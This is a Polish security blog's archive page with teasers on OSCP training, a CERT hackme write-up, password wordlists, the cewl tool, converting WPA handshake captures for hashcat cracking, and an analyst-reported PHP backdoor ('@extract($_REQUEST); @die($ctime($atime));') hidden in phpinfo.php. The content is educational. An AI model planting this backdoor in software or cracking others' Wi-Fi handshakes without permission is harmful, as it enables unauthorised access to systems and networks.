Category Archives: security

[Confidence 2016] Red Team – najlepszy przyjaciel Blue Teamu

confidence16

Dla wszystkich zainteresowanych – na slideshare umieściłem swoją prezentację z tegorocznej konferencji Confidence.

Prezentacja dotyczy głównie redteamingu i podzieliłem ją na trzy części…

Czytaj dalej

Reklamy

PWK&OSCP – part. 3

We are happy to inform you that you have successfully completed the Penetration Testing with Kali Linux certification challenge and have obtained your Offensive Security Certified Professional (OSCP) certification.

Mission completed. Krótko mówiąc – POLECAM. Poniżej kilka przemyśleń i uwag.

Czytaj dalej

Otagowane , , , , , , ,

ECSM Hackme od CERT’u – rozwiązanie

Tak jak obiecałem wrzucam opis mojego rozwiązania ostatniego hackme CERT’u. Mój writeup dostępny jest w formacie PDF pod linkiem [1], dlatego postaram się nie rozwodzić. Skonfrontuję jednak tutaj swoje rozwiązanie ze sposobem opisanym na stronie CERT’u [2]. Zaczynamy.

Czytaj dalej

Otagowane , , , , ,

PWK&OSCP – part. 2

Ok. Minęły 2 miesiące kursu PWK. Tak jak podejrzewałem moim największym problemem jest po prostu czas. Kurs rzeczywiście został przygotowany bardzo dobrze.

Przyjąłem następującą taktykę, która jest moim zdaniem w miarę efektywna:

Obrałem dwie ścieżki, jedna z założenia była szybsza.
I) w każdej wolnej chwili na swoim czytniku e-booku czytałem podręcznik kursu, po to żeby jak najszybciej przebrnąć przez materiał
II) od początku czytając podręcznik, oglądałem filmiki szkoleniowe i robiłem zadania praktyczne

Czytaj dalej

Otagowane , , , ,

Penetration Testing with Kali Linux – part. 1

I tak oto rozpocząłem kurs PWK, który mam nadzieję zakończyć uzyskaniem certyfikatu Offensive Security Certified Professional (OSCP) [1]. Tym samym rozpoczynam serię (myślę, że przynajmniej dwóch 😉 wpisów na temat tego kursu i później samego egzaminu.

Czytaj dalej

Otagowane , , , ,

Polecam: http://sourceforge.net/projects/kali-linux/files/Wordlist/

(po rozpakowaniu z tego co pamiętam ok. 25 GB)

Po rozpakowaniu jeśli dobrze pamiętam ok. 25 GB. Dokładne info na stronie autora [1].

smacznego!

  1. http://bezpieka.org/polski-slownik-premium-polish-wordlist

Polski słownik Premium

Otagowane , ,

Hashcat i łamanie wielu plików *.hccap na raz.

Podążając za instrukcją z wiki hashcata [1] na temat przygotowania plików *.cap do łamania handshake’ów tym narzędziem:

wpaclean <out.cap> <in.cap>
aircrack-ng <out.cap> -J <out.hccap>

Okazuje się, że aircrack-ng pyta nas o nr sieci, którą chcemy wyeksportować (jeśli w danym capie jest ich więcej handshake’ów niż jeden). I co? No i dostajemy hccap’a z jednym „uściskiem dłoni” (tfu! wracam na ponglisz) – handshake’m.

Czytaj dalej

Otagowane , , , , , ,

„ŁAMAŁEM HASŁA, NIE LUDZI…” part. 2 – cewl

Fajnie jest czasem coś stworzyć swojego, ale czasem nie warto. Lepiej skumulować energię na wymagające zadania i nie odkrywać koła na nowo. Nawiązując do mojego poprzedniego wpisu [1] chciałem tylko zwrócić uwagę, na to, że jak mawiają starożytni kukurgistańczycy:

Jeśli problem napotkałeś jakiś – wiedz, że ktoś podobny już wcześniej problem mieć mógł i go w czasie swoim rozwiązał zapewne, a na temat tego wskazówki zdobędziesz wyszukiwarki google silnik wykorzystując sprytnie.

I tak o to do wcześniej wspominanego zadania tworzenia słownika do łamania haseł na podstawie słów znajdujących się na stronie domowej obiektu naszych testów penetracyjnych polecam skrypt cewl [2].

Czytaj dalej

Otagowane , , ,

Polecam. Bardzo fajnie przygotowany CTF z Reverse Engineeringu (w całości obsługiwane z przeglądarki). Z początku kilka prostych leveli na rozruch, ale im dalej w las tym ciekawiej.
url: https://microcorruption.com/

microcorruption – RE CTF

Otagowane ,

Ciekawy backdoor PHP (funkcja extract)

Poraz kolejny dzięki analizie Securi teamu dowiadujemy się o ciekawym backdorze napisanym w PHP [1]. W tym przypadku backdoor został ukryty w pliku phpinfo.php:

@extract ($_REQUEST);

@die ($ctime($atime));

Czytaj dalej

Otagowane , , ,